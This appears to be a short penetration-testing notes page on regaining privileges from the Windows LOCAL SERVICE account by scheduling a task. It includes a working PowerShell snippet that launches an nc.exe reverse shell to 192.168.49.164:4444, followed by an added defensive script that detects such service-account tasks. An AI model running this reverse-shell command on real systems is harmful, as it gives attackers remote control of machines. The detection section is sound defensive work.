
localservice Priv Esc

When you are running as the local service account, you can regain privileges by scheduling a task.

Reference: Give Me Back My Privileges! Please? | itm4n's blog

$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4444 -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "Grants"
Start-ScheduledTask -TaskName "Grants"
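
A defender-side check for the pattern above, added here as an example and not part of the original notes: it lists scheduled tasks whose principal is a built-in service account and whose action starts a script host or a binary outside the Windows and Program Files directories. The function name, the script-host list and the sample task are assumptions made for illustration.

```powershell
# Added defensive example; names below are illustrative, not from the original page.
$ServiceIds   = 'LOCAL SERVICE', 'NETWORK SERVICE', 'S-1-5-19', 'S-1-5-20'
$ScriptHosts  = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'
$TrustedRoots = @($env:windir, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

function Test-SuspiciousServiceTask {
    param([Parameter(Mandatory)] $Task)

    # UserId can appear as 'LOCAL SERVICE', 'NT AUTHORITY\LOCAL SERVICE' or a SID.
    $user = $Task.Principal.UserId -replace '^NT AUTHORITY\\', ''
    if ($user -notin $ServiceIds) { return }

    foreach ($action in $Task.Actions) {
        if (-not $action.Execute) { continue }   # COM handler actions have no Execute
        $exe  = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
        $leaf = Split-Path -Leaf $exe
        if ($leaf -in $ScriptHosts) {
            "script host: $leaf $($action.Arguments)"
        }
        elseif ([IO.Path]::IsPathRooted($exe) -and
                -not ($TrustedRoots | Where-Object { $exe.StartsWith($_, 'OrdinalIgnoreCase') })) {
            "binary outside system directories: $exe"
        }
    }
}

# Constructed sample shaped like Get-ScheduledTask output, so the check runs offline.
$sample = [pscustomobject]@{
    TaskName  = 'ExampleTask'
    TaskPath  = '\'
    Principal = [pscustomobject]@{ UserId = 'LOCAL SERVICE' }
    Actions   = @([pscustomobject]@{
        Execute   = 'powershell.exe'
        Arguments = '-Exec Bypass -Command "C:\example\tool.exe"'
    })
}

# On a live host, replace @($sample) with (Get-ScheduledTask).
foreach ($task in @($sample)) {
    $reasons = @(Test-SuspiciousServiceTask -Task $task)
    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Task    = $task.TaskPath + $task.TaskName
            User    = $task.Principal.UserId
            Reasons = $reasons -join '; '
        }
    }
}
```

Many built-in Windows tasks legitimately run as LOCAL SERVICE, so compare hits against a known-good baseline of the host. Task creation is also recorded as Security event 4698 when auditing of other object access events is enabled.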
​
Last modified 10mo ago